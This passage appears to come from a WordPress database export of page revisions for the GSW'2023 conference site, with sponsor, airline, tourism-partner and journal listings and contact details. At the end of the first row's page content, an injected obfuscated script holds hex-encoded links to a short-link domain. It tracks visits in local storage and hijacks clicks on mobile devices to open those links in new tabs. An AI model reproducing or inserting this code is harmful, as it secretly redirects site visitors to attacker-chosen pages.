main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:27:25','2023-08-16 00:27:25','',3066,'https://gsw2023.com/?p=5252',0,'revision','',0),
(5253,1,'2023-08-16 00:27:44','2023-08-16 00:27:44','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145556440{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145507665{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of 